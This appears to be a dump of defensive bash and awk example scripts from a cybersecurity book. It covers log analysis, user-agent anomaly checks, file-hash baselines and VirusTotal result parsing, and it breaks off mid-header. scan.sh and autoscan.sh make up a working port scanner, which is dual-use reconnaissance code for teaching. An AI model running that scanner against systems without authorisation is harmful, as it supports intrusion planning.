192.168.0.37 - - [12/Nov/2017:19:25:45 -0500] "GET /files/theme/plugin49c2.js?1490908488 HTTP/1.1" 200 19444 "http://192.168.0.35/about.html" "Mozilla/5.0 (Windows NT 5.1; rv:43.0) Gecko/20100101 Firefox/43.0"
192.168.0.37 - - [12/Nov/2017:19:25:46 -0500] "GET /_/cdn2.editmysite.com/images/editor/theme-background/stock/GW-bridge.html HTTP/1.1" 200 5011 "http://192.168.0.35/about.html" "Mozilla/5.0 (Windows NT 5.1; rv:43.0) Gecko/20100101 Firefox/43.0"
192.168.0.37 - - [12/Nov/2017:19:26:04 -0500] "GET /consulting.html HTTP/1.1" 200 7269 "http://192.168.0.35/about.html" "Mozilla/5.0 (Windows NT 5.1; rv:43.0) Gecko/20100101 Firefox/43.0"
192.168.0.37 - - [12/Nov/2017:19:26:04 -0500] "GET /files/main_styleaf0e.css?1509483497 HTTP/1.1" 200 5022 "http://192.168.0.35/consulting.html" "Mozilla/5.0 (Windows NT 5.1; rv:43.0) Gecko/20100101 Firefox/43.0"
192.168.0.37 - - [12/Nov/2017:19:26:04 -0500] "GET /files/theme/mobile49c2.js?1490908488 HTTP/1.1" 200 3414 "http://192.168.0.35/consulting.html" "Mozilla/5.0 (Windows NT 5.1; rv:43.0) Gecko/20100101 Firefox/43.0"
192.168.0.37 - - [12/Nov/2017:19:26:04 -0500] "GET /files/theme/plugin49c2.js?1490908488 HTTP/1.1" 200 19444 "http://192.168.0.35/consulting.html" "Mozilla/5.0 (Windows NT 5.1; rv:43.0) Gecko/20100101 Firefox/43.0"
192.168.0.37 - - [12/Nov/2017:19:26:04 -0500] "GET /files/theme/custom49c2.js?1490908488 HTTP/1.1" 200 1430 "http://192.168.0.35/consulting.html" "Mozilla/5.0 (Windows NT 5.1; rv:43.0) Gecko/20100101 Firefox/43.0"
192.168.0.11 - - [12/Nov/2017:19:26:09 -0500] "GET /resources.html HTTP/1.1" 200 7569 "http://192.168.0.35/risk.html" "Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:56.0) Gecko/20100101 Firefox/56.0"
192.168.0.11 - - [12/Nov/2017:19:26:09 -0500] "GET /files/main_styleaf0e.css?1509483497 HTTP/1.1" 200 5022 "http://192.168.0.35/resources.html" "Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:56.0) Gecko/20100101 Firefox/56.0"
192.168.0.11 - - [12/Nov/2017:19:26:09 -0500] "GET /_/cdn2.editmysite.com/images/editor/theme-background/stock/Work-Outside.html HTTP/1.1" 200 5011 "http://192.168.0.35/resources.html" "Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:56.0) Gecko/20100101 Firefox/56.0"
================================================
FILE: ch07/countem.awk
================================================
# Cybersecurity Ops with bash
# countem.awk
#
# Description:
# Count the number of instances of an item using awk
#
# Usage:
# countem.awk < inputfile
#
awk '{ cnt[$1]++ }
END { for (id in cnt) {
printf "%d %s\n", cnt[id], id
}
}'
================================================
FILE: ch07/countem.sh
================================================
#!/bin/bash -
#
# Cybersecurity Ops with bash
# countem.sh
#
# Description:
# Count the number of instances of an item using bash
#
# Usage:
# countem.sh < inputfile
#
declare -A cnt # assoc. array # <1>
while read id xtra # <2>
do
let cnt[$id]++ # <3>
done
# now display what we counted
# for each key in the (key, value) assoc. array
for id in "${!cnt[@]}" # <4>
do
printf '%s %d\n' "$id" "${cnt[$id]}" # <5>
done
================================================
FILE: ch07/histogram.sh
================================================
#!/bin/bash -
#
# Cybersecurity Ops with bash
# histogram.sh
#
# Description:
# Generate a horizontal bar chart of specified data
#
# Usage: ./histogram.sh
# input format: label value
#
function pr_bar () # <1>
{
local -i i raw maxraw scaled # <2>
raw=$1
maxraw=$2
((scaled=(MAXBAR*raw)/maxraw)) # <3>
# min size guarantee
((raw > 0 && scaled == 0)) && scaled=1 # <4>
for((i=0; i<scaled; i++)) ; do printf '#' ; done
printf '\n'
} # pr_bar
#
# "main"
#
declare -A RA # <5>
declare -i MAXBAR max
max=0
MAXBAR=50 # how large the largest bar should be
while read labl val
do
let RA[$labl]=$val # <6>
# keep the largest value; for scaling
(( val > max )) && max=$val
done
# scale and print it
for labl in "${!RA[@]}" # <7>
do
printf '%-20.20s ' "$labl"
pr_bar ${RA[$labl]} $max # <8>
done
================================================
FILE: ch07/histogram_plain.sh
================================================
#!/bin/bash -
#
# Cybersecurity Ops with bash
# histogram_plain.sh
#
# Description:
# Generate a horizontal bar chart of specified data without
# using associative arrays, good for older versions of bash
#
# Usage: ./histogram_plain.sh
# input format: label value
#
declare -a RA_key RA_val # <1>
declare -i max ndx
max=0
maxbar=50 # how large the largest bar should be
ndx=0
while read labl val
do
RA_key[$ndx]=$labl # <2>
RA_value[$ndx]=$val
# keep the largest value; for scaling
(( val > max )) && max=$val
let ndx++
done
# scale and print it
for ((j=0; j<ndx; j++)) # <3>
do
printf "%-20.20s " ${RA_key[$j]}
pr_bar ${RA_value[$j]} $max
done
================================================
FILE: ch07/pagereq.awk
================================================
# Cybersecurity Ops with bash
# pagereq.awk
#
# Description:
# Count the number of page requests for a given IP address using awk
#
# Usage:
# pagereq <ip address> < inputfile
# <ip address> IP address to search for
#
# count the number of page requests from an address ($1)
awk -v page="$1" '{ if ($1==page) {cnt[$7]+=1 } } # <1>
END { for (id in cnt) { # <2>
printf "%8d %s\n", cnt[id], id
}
}'
================================================
FILE: ch07/pagereq.sh
================================================
# Cybersecurity Ops with bash
# pagereq.sh
#
# Description:
# Count the number of page requests for a given IP address using bash
#
# Usage:
# pagereq <ip address> < inputfile
# <ip address> IP address to search for
#
declare -A cnt # <1>
while read addr d1 d2 datim gmtoff getr page therest
do
if [[ $1 == $addr ]] ; then let cnt[$page]+=1 ; fi
done
for id in ${!cnt[@]} # <2>
do
printf "%8d %s\n" ${cnt[$id]} $id
done
================================================
FILE: ch07/summer.sh
================================================
#!/bin/bash -
#
# Cybersecurity Ops with bash
# summer.sh
#
# Description:
# Sum the total of field 2 values for each unique field 1
#
# Usage: ./summer.sh
# input format: <name> <number>
#
declare -A cnt # assoc. array
while read id count
do
let cnt[$id]+=$count
done
for id in "${!cnt[@]}"
do
printf "%-15s %8d\n" "${id}" "${cnt[${id}]}" #<1>
done
================================================
FILE: ch07/useragents.sh
================================================
#!/bin/bash -
#
# Cybersecurity Ops with bash
# useragents.sh
#
# Description:
# Read through a log looking for unknown user agents
#
# Usage: ./useragents.sh < <inputfile>
# <inputfile> Apache access log
#
# mismatch - search through the array of known names
# returns 1 (false) if it finds a match
# returns 0 (true) if there is no match
function mismatch () # <1>
{
local -i i # <2>
for ((i=0; i<$KNSIZE; i++))
do
[[ "$1" =~ .*${KNOWN[$i]}.* ]] && return 1 # <3>
done
return 0
}
# read up the known ones
readarray -t KNOWN < "useragents.txt" # <4>
KNSIZE=${#KNOWN[@]} # <5>
# preprocess logfile (stdin) to pick out ipaddr and user agent
awk -F'"' '{print $1, $6}' | \
while read ipaddr dash1 dash2 dtstamp delta useragent # <6>
do
if mismatch "$useragent"
then
echo "anomaly: $ipaddr $useragent"
fi
done
================================================
FILE: ch07/useragents.txt
================================================
Firefox
Chrome
Safari
Edge
================================================
FILE: ch08/livebar.sh
================================================
#!/bin/bash -
#
# Cybersecurity Ops with bash
# livebar.sh
#
# Description:
# Creates a rolling horizontal bar chart of live data
#
# Usage:
# <output from other script or program> | bash livebar.sh
#
function pr_bar () # <1>
{
local raw maxraw scaled
raw=$1
maxraw=$2
((scaled=(maxbar*raw)/maxraw))
((scaled == 0)) && scaled=1 # min size guarantee
for((i=0; i<scaled; i++)) ; do printf '#' ; done
printf '\n'
} # pr_bar
maxbar=60 # largest no. of chars in a bar # <2>
MAX=60
while read dayst timst qty
do
if (( qty > MAX )) # <3>
then
let MAX=$qty+$qty/4 # allow some room
echo " **** rescaling: MAX=$MAX"
fi
printf '%6.6s %6.6s %4d:' $dayst $timst $qty # <4>
pr_bar $qty $MAX
done
================================================
FILE: ch08/looper.sh
================================================
#!/bin/bash -
#
# Cybersecurity Ops with bash
# looper.sh
#
# Description:
# Count the lines in a file being tailed -f
# Report the count interval on every SIGUSR1
#
# Usage: ./looper.sh [filename]
# filename of file to be tailed, default: log.file
#
function interval () # <1>
{
echo $(date '+%y%m%d %H%M%S') $cnt # <2>
cnt=0
}
declare -i cnt=0
trap interval SIGUSR1 # <3>
shopt -s lastpipe # <4>
tail -f --pid=$$ ${1:-log.file} | while read aline # <5>
do
let cnt++
done
================================================
FILE: ch08/tailcount.sh
================================================
#!/bin/bash -
#
# Cybersecurity Ops with bash
# tailcount.sh
#
# Description:
# Count lines every n seconds
#
# Usage: ./tailcount.sh [filename]
# filename: passed to looper.sh
#
# cleanup - the other processes on exit
function cleanup ()
{
[[ -n $LOPID ]] && kill $LOPID # <1>
}
trap cleanup EXIT # <2>
bash looper.sh $1 & # <3>
LOPID=$! # <4>
# give it a chance to start up
sleep 3
while true
do
kill -SIGUSR1 $LOPID
sleep 5
done >&2 # <5>
================================================
FILE: ch08/wintail.sh
================================================
#!/bin/bash -
#
# Cybersecurity Ops with bash
# wintail.sh
#
# Description:
# Perform a tail-like function on a Windows log
#
# Usage: ./wintail.sh
#
WINLOG="Application" #<1>
LASTLOG=$(wevtutil qe "$WINLOG" //c:1 //rd:true //f:text) #<2>
while true
do
CURRENTLOG=$(wevtutil qe "$WINLOG" //c:1 //rd:true //f:text) #<3>
if [[ "$CURRENTLOG" != "$LASTLOG" ]]
then
echo "$CURRENTLOG"
echo "----------------------------------"
LASTLOG="$CURRENTLOG"
fi
done
================================================
FILE: ch09/autoscan.sh
================================================
#!/bin/bash -
#
# Cybersecurity Ops with bash
# autoscan.sh
#
# Description:
# Automatically performs a port scan (using scan.sh),
# compares output to previous results, and emails user
# Assumes that scan.sh is in the current directory.
#
# Usage: ./autoscan.sh
#
./scan.sh < hostlist # <1>
FILELIST=$(ls scan_* | tail -2) # <2>
FILES=( $FILELIST )
TMPFILE=$(tempfile) # <3>
./fd2.sh ${FILES[0]} ${FILES[1]} > $TMPFILE
if [[ -s $TMPFILE ]] # non-empty # <4>
then
echo "mailing today's port differences to $USER"
mail -s "today's port differences" $USER < $TMPFILE # <5>
fi
# clean up
rm -f $TMPFILE # <6>
================================================
FILE: ch09/fd2.sh
================================================
#!/bin/bash -
#
# Cybersecurity Ops with bash
# fd2.sh
#
# Description:
# Compares two port scans to find changes
# MAJOR ASSUMPTION: both files have the same # of lines,
# each line with the same host address
# though with possibly different listed ports
#
# Usage: ./fd2.sh <file1> <file2>
#
# look for "$LOOKFOR" in the list of args to this function
# returns true (0) if it is not in the list
function NotInList () # <1>
{
for port in "$@"
do
if [[ $port == $LOOKFOR ]]
then
return 1
fi
done
return 0
}
while true
do
read aline <&4 || break # at EOF # <2>
read bline <&5 || break # at EOF, for symmetry # <3>
# if [[ $aline == $bline ]] ; then continue; fi
[[ $aline == $bline ]] && continue; # <4>
# there's a difference, so we
# subdivide into host and ports
HOSTA=${aline%% *} # <5>
PORTSA=( ${aline#* } ) # <6>
HOSTB=${bline%% *}
PORTSB=( ${bline#* } )
echo $HOSTA # identify the host which changed
for porta in ${PORTSA[@]}
do # <7>
LOOKFOR=$porta NotInList ${PORTSB[@]} && echo " closed: $porta"
done
for portb in ${PORTSB[@]}
do
LOOKFOR=$portb NotInList ${PORTSA[@]} && echo " new: $portb"
done
done 4< ${1:-day1.data} 5< ${2:-day2.data} # <8>
# day1.data and day2.data are default names to make it easier to test
================================================
FILE: ch09/scan.sh
================================================
#!/bin/bash -
#
# Cybersecurity Ops with bash
# scan.sh
#
# Description:
# Perform a port scan of a specified host
#
# Usage: ./scan.sh <output file>
# <output file> File to save results in
#
function scan ()
{
host=$1
printf '%s' "$host" # <1>
for ((port=1;port<1024;port++))
do
# order of redirects is important for 2 reasons
echo >/dev/null 2>&1 < /dev/tcp/${host}/${port} # <2>
if (($? == 0)) ; then printf ' %d' "${port}" ; fi # <3>
done
echo # or printf '\n'
}
#
# main loop
# read in each host name (from stdin)
# and scan for open ports
# save the results in a file
# whose name is supplied as an argument
# or default to one based on today's date
#
printf -v TODAY 'scan_%(%F)T' -1 # e.g., scan_2017-11-27 # <4>
OUTFILE=${1:-$TODAY} # <5>
while read HOSTNAME
do
scan $HOSTNAME
done > $OUTFILE # <6>
================================================
FILE: ch10/baseline.sh
================================================
#!/bin/bash
# baseline.sh - compare baselines
# and report on differences
#
function usageErr ()
{
echo 'usage: baseline.sh [-d path] file1 [file2]'
echo 'creates or compares a baseline from path'
echo 'default for path is /'
exit 2
} >&2 # <1>
function dosumming ()
{
find "${DIR[@]}" -type f | xargs -d '\n' sha1sum # <2>
}
# ===============================
# MAIN
# ===============================
declare -a DIR
# ---------- parse the arguments
while getopts "d:" MYOPT # <3>
do
# no check for MYOPT since there is only one choice
DIR+=( "$OPTARG" ) # <4>
done
shift $((OPTIND-1)) # <5>
# no arguments? too many?
(( $# == 0 || $# > 2 )) && usageErr
(( ${#DIR[*]} == 0 )) && DIR=( "/" ) # <6>
# create either a baseline (only 1 filename provided)
# or a secondary summary (when two filenames are provided)
BASE="$1"
B2ND="$2"
if (( $# == 1 )) # only 1 arg.
then
# creating "$BASE"
dosumming > "$BASE"
# all done for baseline
exit
fi
if [[ ! -r "$BASE" ]]
then
usageErr
fi
# --------- on to the actual work:
# if 2nd file exists just compare the two
# else create/fill it
if [[ ! -e "$B2ND" ]]
then
echo creating "$B2ND"
dosumming > "$B2ND"
fi
# now we have: 2 files created by sha1sum
declare -A BYPATH BYHASH INUSE # assoc. arrays
# load up the first file as the baseline
while read HNUM FN
do
BYPATH["$FN"]=$HNUM
BYHASH[$HNUM]="$FN"
INUSE["$FN"]="X"
done < "$BASE"
# ------ now begin the output
# see if each filename listed in the 2nd file is in
# the same place (path) as in the 1st (the baseline)
printf '<filesystem host="%s" dir="%s">\n' "$HOSTNAME" "${DIR[*]}"
while read HNUM FN # <7>
do
WASHASH="${BYPATH[${FN}]}"
# did it find one? if not, it will be null
if [[ -z $WASHASH ]]
then
ALTFN="${BYHASH[$HNUM]}"
if [[ -z $ALTFN ]]
then
printf ' <new>%s</new>\n' "$FN"
else
printf ' <relocated orig="%s">%s</relocated>\n' "$ALTFN" "$FN"
INUSE["$ALTFN"]='_' # mark this as seen
fi
else
INUSE["$FN"]='_' # mark this as seen
if [[ $HNUM == $WASHASH ]]
then
continue; # nothing changed;
else
printf ' <changed>%s</changed>\n' "$FN"
fi
fi
done < "$B2ND" # <8>
for FN in "${!INUSE[@]}"
do
if [[ "${INUSE[$FN]}" == 'X' ]]
then
printf ' <removed>%s</removed>\n' "$FN"
fi
done
printf '</filesystem>\n'
================================================
FILE: ch11/Calc_VT.txt
================================================
{"scans": {"Bkav": {"detected": false, "version": "1.3.0.9466", "result": null, "update": "20180712"}, "MicroWorld-eScan": {"detected": false, "version": "14.0.297.0", "result": null, "update": "20180712"}, "VBA32": {"detected": false, "version": "3.12.32.0", "result": null, "update": "20180712"}, "CMC": {"detected": false, "version": "1.1.0.977", "result": null, "update": "20180712"}, "CAT-QuickHeal": {"detected": false, "version": "14.00", "result": null, "update": "20180712"}, "McAfee": {"detected": false, "version": "6.0.6.653", "result": null, "update": "20180712"}, "Cylance": {"detected": true, "version": "2.3.1.101", "result": "Unsafe", "update": "20180712"}, "AegisLab": {"detected": false, "version": "4.2", "result": null, "update": "20180712"}, "CrowdStrike": {"detected": false, "version": "1.0", "result": null, "update": "20180530"}, "K7GW": {"detected": false, "version": "10.53.27735", "result": null, "update": "20180712"}, "K7AntiVirus": {"detected": false, "version": "10.53.27740", "result": null, "update": "20180712"}, "TheHacker": {"detected": false, "version": "6.8.0.5.3314", "result": null, "update": "20180712"}, "TrendMicro": {"detected": false, "version": "10.0.0.1040", "result": null, "update": "20180712"}, "Baidu": {"detected": false, "version": "1.0.0.2", "result": null, "update": "20180712"}, "NANO-Antivirus": {"detected": false, "version": "1.0.116.23366", "result": null, "update": "20180712"}, "F-Prot": {"detected": false, "version": "4.7.1.166", "result": null, "update": "20180712"}, "Symantec": {"detected": false, "version": "1.6.0.0", "result": null, "update": "20180712"}, "ESET-NOD32": {"detected": false, "version": "17703", "result": null, "update": "20180712"}, "TrendMicro-HouseCall": {"detected": false, "version": "9.950.0.1006", "result": null, "update": "20180712"}, "Paloalto": {"detected": false, "version": "1.0", "result": null, "update": "20180712"}, "ClamAV": {"detected": false, "version": "0.100.1.0", "result": null, "update": "20180712"}, "Kaspersky": {"detected": false, "version": "15.0.1.13", "result": null, "update": "20180712"}, "BitDefender": {"detected": false, "version": "7.2", "result": null, "update": "20180712"}, "Babable": {"detected": false, "version": "9107201", "result": null, "update": "20180406"}, "ViRobot": {"detected": false, "version": "2014.3.20.0", "result": null, "update": "20180712"}, "Avast": {"detected": false, "version": "18.4.3895.0", "result": null, "update": "20180712"}, "Tencent": {"detected": false, "version": "1.0.0.1", "result": null, "update": "20180712"}, "Endgame": {"detected": false, "version": "3.0.0", "result": null, "update": "20180711"}, "Sophos": {"detected": false, "version": "4.98.0", "result": null, "update": "20180712"}, "Comodo": {"detected": false, "version": "29334", "result": null, "update": "20180712"}, "F-Secure": {"detected": false, "version": "11.0.19100.45", "result": null, "update": "20180712"}, "DrWeb": {"detected": false, "version": "7.0.33.6080", "result": null, "update": "20180712"}, "VIPRE": {"detected": false, "version": "68060", "result": null, "update": "20180712"}, "Invincea": {"detected": false, "version": "6.3.5.26121", "result": null, "update": "20180601"}, "McAfee-GW-Edition": {"detected": false, "version": "v2017.3010", "result": null, "update": "20180712"}, "Emsisoft": {"detected": false, "version": "2018.4.0.1029", "result": null, "update": "20180712"}, "SentinelOne": {"detected": false, "version": "1.0.17.227", "result": null, "update": "20180701"}, "Cyren": {"detected": false, "version": "6.0.0.4", "result": null, "update": "20180712"}, "Jiangmin": {"detected": false, "version": "16.0.100", "result": null, "update": "20180712"}, "Webroot": {"detected": false, "version": "1.0.0.403", "result": null, "update": "20180712"}, "Avira": {"detected": false, "version": "8.3.3.6", "result": null, "update": "20180710"}, "MAX": {"detected": false, "version": "2017.11.15.1", "result": null, "update": "20180712"}, "Antiy-AVL": {"detected": false, "version": "3.0.0.1", "result": null, "update": "20180712"}, "Kingsoft": {"detected": false, "version": "2013.8.14.323", "result": null, "update": "20180712"}, "Microsoft": {"detected": false, "version": "1.1.15000.2", "result": null, "update": "20180712"}, "Arcabit": {"detected": false, "version": "1.0.0.831", "result": null, "update": "20180712"}, "SUPERAntiSpyware": {"detected": false, "version": "5.6.0.1032", "result": null, "update": "20180712"}, "ZoneAlarm": {"detected": false, "version": "1.0", "result": null, "update": "20180712"}, "Avast-Mobile": {"detected": false, "version": "180711-22", "result": null, "update": "20180712"}, "GData": {"detected": false, "version": "A:25.17758B:25.12706", "result": null, "update": "20180712"}, "AhnLab-V3": {"detected": false, "version": "3.13.1.21452", "result": null, "update": "20180712"}, "ALYac": {"detected": false, "version": "1.1.1.5", "result": null, "update": "20180712"}, "AVware": {"detected": false, "version": "1.6.0.52", "result": null, "update": "20180712"}, "TACHYON": {"detected": false, "version": "2018-07-12.02", "result": null, "update": "20180712"}, "Ad-Aware": {"detected": false, "version": "3.0.5.370", "result": null, "update": "20180712"}, "Malwarebytes": {"detected": false, "version": "2.1.1.1115", "result": null, "update": "20180712"}, "Zoner": {"detected": false, "version": "1.0", "result": null, "update": "20180711"}, "Rising": {"detected": false, "version": "25.0.0.20", "result": null, "update": "20180712"}, "Yandex": {"detected": false, "version": "5.5.1.3", "result": null, "update": "20180712"}, "Ikarus": {"detected": false, "version": "0.1.5.2", "result": null, "update": "20180712"}, "eGambit": {"detected": false, "version": null, "result": null, "update": "20180712"}, "Fortinet": {"detected": false, "version": "5.4.247.0", "result": null, "update": "20180712"}, "AVG": {"detected": false, "version": "18.4.3895.0", "result": null, "update": "20180712"}, "Cybereason": {"detected": false, "version": "1.2.27", "result": null, "update": "20180225"}, "Panda": {"detected": false, "version": "4.6.4.2", "result": null, "update": "20180712"}, "Qihoo-360": {"detected": false, "version": "1.0.0.1120", "result": null, "update": "20180712"}}, "scan_id": "284674a806bcbe692c76761baaf21327638de0c7135bfb06953648be7d661fbd-1531411370", "sha1": "1a4e2c3bbc095cb7d9b85cabe2aea2c9a769b480", "resource": "284674a806bcbe692c76761baaf21327638de0c7135bfb06953648be7d661fbd", "response_code": 1, "scan_date": "2018-07-12 16:02:50", "permalink": "https://www.virustotal.com/file/284674a806bcbe692c76761baaf21327638de0c7135bfb06953648be7d661fbd/analysis/1531411370/", "verbose_msg": "Scan finished, information embedded", "total": 66, "positives": 1, "sha256": "284674a806bcbe692c76761baaf21327638de0c7135bfb06953648be7d661fbd", "md5": "afaf2cdf9981342c494b28630608f74a"}
================================================
FILE: ch11/WannaCry_VT.txt
================================================
{"scans": {"Bkav": {"detected": true, "version": "1.3.0.9466", "result": "W32.WannaCrypLTE.Trojan", "update": "20180712"}, "MicroWorld-eScan": {"detected": true, "version": "14.0.297.0", "result": "Trojan.Ransom.WannaCryptor.H", "update": "20180712"}, "CMC": {"detected": false, "version": "1.1.0.977", "result": null, "update": "20180712"}, "CAT-QuickHeal": {"detected": true, "version": "14.00", "result": "Trojan.Mauvaise.SL1", "update": "20180712"}, "McAfee": {"detected": true, "version": "6.0.6.653", "result": "Ransom-O", "update": "20180712"}, "Cylance": {"detected": true, "version": "2.3.1.101", "result": "Unsafe", "update": "20180712"}, "Zillya": {"detected": true, "version": "2.0.0.3593", "result": "Trojan.WannaCryptGen.Win32.2", "update": "20180712"}, "SUPERAntiSpyware": {"detected": true, "version": "5.6.0.1032", "result": "Ransom.WannaCrypt/Variant", "update": "20180712"}, "TheHacker": {"detected": true, "version": "6.8.0.5.3314", "result": "Trojan/Exploit.CVE-2017-0147.a", "update": "20180712"}, "K7GW": {"detected": true, "version": "10.53.27735", "result": "Exploit ( 0050d7a31 )", "update": "20180712"}, "K7AntiVirus": {"detected": true, "version": "10.53.27740", "result": "Exploit ( 0050d7a31 )", "update": "20180712"}, "Arcabit": {"detected": false, "version": "1.0.0.831", "result": null, "update": "20180712"}, "TrendMicro": {"detected": true, "version": "10.0.0.1040", "result": "WORM_WCRY.A", "update": "20180712"}, "Baidu": {"detected": true, "version": "1.0.0.2", "result": "Win32.Worm.Rbot.a", "update": "20180712"}, "NANO-Antivirus": {"detected": true, "version": "1.0.116.23366", "result": "Trojan.Win32.Wanna.eoqegc", "update": "20180712"}, "Cyren": {"detected": true, "version": "6.0.0.4", "result": "W32/Trojan.ZTSA-8671", "update": "20180712"}, "Symantec": {"detected": true, "version": "1.6.0.0", "result": "Ransom.Wannacry", "update": "20180712"}, "TotalDefense": {"detected": false, "version": "37.1.62.1", "result": null, "update": "20180712"}, "TrendMicro-HouseCall": {"detected": true, "version": "9.950.0.1006", "result": "WORM_WCRY.A", "update": "20180712"}, "Avast": {"detected": true, "version": "18.4.3895.0", "result": "Win32:WanaCry-A [Trj]", "update": "20180712"}, "ClamAV": {"detected": true, "version": "0.100.1.0", "result": "Win.Ransomware.WannaCry-6313787-0", "update": "20180712"}, "Kaspersky": {"detected": true, "version": "15.0.1.13", "result": "Trojan-Ransom.Win32.Wanna.m", "update": "20180712"}, "BitDefender": {"detected": true, "version": "7.2", "result": "Trojan.Ransom.WannaCryptor.H", "update": "20180712"}, "Babable": {"detected": false, "version": "9107201", "result": null, "update": "20180406"}, "Paloalto": {"detected": true, "version": "1.0", "result": "generic.ml", "update": "20180712"}, "AegisLab": {"detected": true, "version": "4.2", "result": "Troj.Ransom.W32!c", "update": "20180712"}, "Rising": {"detected": true, "version": "25.0.0.20", "result": "Exploit.EternalBlue!1.AAED (CLASSIC)", "update": "20180712"}, "Ad-Aware": {"detected": true, "version": "3.0.5.370", "result": "Trojan.Ransom.WannaCryptor.H", "update": "20180712"}, "Emsisoft": {"detected": true, "version": "2018.4.0.1029", "result": "Trojan-Ransom.WanaCrypt0r (A)", "update": "20180712"}, "Comodo": {"detected": true, "version": "29335", "result": "TrojWare.Win32.WannaCry.jet", "update": "20180712"}, "F-Secure": {"detected": true, "version": "11.0.19100.45", "result": "Trojan.Ransom.WannaCryptor.H", "update": "20180712"}, "DrWeb": {"detected": true, "version": "7.0.33.6080", "result": "Trojan.Encoder.11432", "update": "20180712"}, "VIPRE": {"detected": true, "version": "68066", "result": "Trojan.Win32.Generic!BT", "update": "20180712"}, "Invincea": {"detected": true, "version": "6.3.5.26121", "result": "heuristic", "update": "20180601"}, "McAfee-GW-Edition": {"detected": true, "version": "v2017.3010", "result": "BehavesLike.Win32.RansomWannaCry.wc", "update": "20180712"}, "Sophos": {"detected": true, "version": "4.98.0", "result": "Troj/Ransom-EMG", "update": "20180712"}, "SentinelOne": {"detected": true, "version": "1.0.17.227", "result": "static engine - malicious", "update": "20180701"}, "F-Prot": {"detected": true, "version": "4.7.1.166", "result": "W32/WannaCrypt.D", "update": "20180712"}, "Jiangmin": {"detected": true, "version": "16.0.100", "result": "Trojan.WanaCry.i", "update": "20180712"}, "Webroot": {"detected": true, "version": "1.0.0.403", "result": "W32.Ransom.Wannacry", "update": "20180712"}, "Avira": {"detected": true, "version": "8.3.3.6", "result": "TR/Ransom.IZ", "update": "20180712"}, "Fortinet": {"detected": true, "version": "5.4.247.0", "result": "W32/WannaCryptor.H!tr.ransom", "update": "20180712"}, "Antiy-AVL": {"detected": true, "version": "3.0.0.1", "result": "Trojan[Ransom]/Win32.Scatter", "update": "20180712"}, "Kingsoft": {"detected": false, "version": "2013.8.14.323", "result": null, "update": "20180712"}, "Endgame": {"detected": true, "version": "3.0.0", "result": "malicious (high confidence)", "update": "20180711"}, "Microsoft": {"detected": true, "version": "1.1.15000.2", "result": "Ransom:Win32/WannaCrypt", "update": "20180712"}, "ViRobot": {"detected": true, "version": "2014.3.20.0", "result": "Trojan.Win32.S.WannaCry.3723264.S", "update": "20180712"}, "ZoneAlarm": {"detected": true, "version": "1.0", "result": "Trojan-Ransom.Win32.Wanna.m", "update": "20180712"}, "Avast-Mobile": {"detected": false, "version": "180711-22", "result": null, "update": "20180712"}, "TACHYON": {"detected": true, "version": "2018-07-12.02", "result": "Ransom/W32.WannaCry.Zen", "update": "20180712"}, "AhnLab-V3": {"detected": true, "version": "3.13.1.21452", "result": "Trojan/Win32.WannaCryptor.R200572", "update": "20180712"}, "ALYac": {"detected": true, "version": "1.1.1.5", "result": "Trojan.Ransom.WannaCryptor", "update": "20180712"}, "AVware": {"detected": true, "version": "1.6.0.52", "result": "Trojan.Win32.Generic!BT", "update": "20180712"}, "MAX": {"detected": true, "version": "2017.11.15.1", "result": "malware (ai score=100)", "update": "20180712"}, "VBA32": {"detected": true, "version": "3.12.32.0", "result": "TrojanRansom.Wanna", "update": "20180712"}, "Malwarebytes": {"detected": true, "version": "2.1.1.1115", "result": "Ransom.WannaCrypt", "update": "20180712"}, "Zoner": {"detected": true, "version": "1.0", "result": "Trojan.Wannacry", "update": "20180711"}, "ESET-NOD32": {"detected": true, "version": "17703", "result": "Win32/Exploit.CVE-2017-0147.A", "update": "20180712"}, "Tencent": {"detected": true, "version": "1.0.0.1", "result": "Trojan.Win32.WannaCry.b", "update": "20180712"}, "Yandex": {"detected": true, "version": "5.5.1.3", "result": "Exploit.CVE-2017-0147!", "update": "20180712"}, "Ikarus": {"detected": true, "version": "0.1.5.2", "result": "Trojan-Ransom.WannaCry", "update": "20180712"}, "eGambit": {"detected": false, "version": null, "result": null, "update": "20180712"}, "GData": {"detected": true, "version": "A:25.17758B:25.12706", "result": "Win32.Trojan-Ransom.WannaCry.D", "update": "20180712"}, "AVG": {"detected": true, "version": "18.4.3895.0", "result": "Win32:WanaCry-A [Trj]", "update": "20180712"}, "Cybereason": {"detected": true, "version": "1.2.27", "result": "malicious.7c37d2", "update": "20180225"}, "Panda": {"detected": true, "version": "4.6.4.2", "result": "Trj/RansomCrypt.K", "update": "20180712"}, "CrowdStrike": {"detected": true, "version": "1.0", "result": "malicious_confidence_100% (W)", "update": "20180530"}, "Qihoo-360": {"detected": true, "version": "1.0.0.1120", "result": "Win32/Trojan.Multi.daf", "update": "20180712"}}, "scan_id": "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c-1531416969", "sha1": "e889544aff85ffaf8b0d0da705105dee7c97fe26", "resource": "db349b97c37d22f5ea1d1841e3c89eb4", "response_code": 1, "scan_date": "2018-07-12 17:36:09", "permalink": "https://www.virustotal.com/file/24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c/analysis/1531416969/", "verbose_msg": "Scan finished, information embedded", "total": 68, "positives": 61, "sha256": "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c", "md5": "db349b97c37d22f5ea1d1841e3c89eb4"}
================================================
FILE: ch11/helloworld.c
================================================
#include <stdio.h>
int main()
{
printf("Hello World!\n");
return 0;
}
================================================
FILE: ch11/vtjson.awk
================================================
# Cybersecurity Ops with bash
# vtjson.awk
#
# Description:
# Search a JSON file for VirusTotal malware hits
#
# Usage:
# vtjson.awk <json file>
# <json file> File containing results from VirusTotal
#
FN="${1:-Calc_VirusTotal.txt}"
sed -e 's/{"scans": {/&\n /' -e 's/},/&\n/g' "$FN" | # <1>
awk '
NF == 9 { # <2>
COMMA=","
QUOTE="\"" # <3>
if ( $3 == "true" COMMA ) { # <4>
VIRUS=$1 # <5>
gsub(QUOTE, "", VIRUS) # <6>
RESLT=$7
gsub(QUOTE, "", RESLT)
gsub(COMMA, "", RESLT)
print VIRUS, "- result:", RESLT
}
}'
================================================
FILE: ch11/vtjson.sh
================================================
#!/bin/bash -
#
# Rapid Cybersecurity Ops
# vtjson.sh
#
# Description:
# Search a JSON file for VirusTotal malware hits
#
# Usage:
# vtjson.awk [<json file>]
# <json file> File containing results from VirusTotal
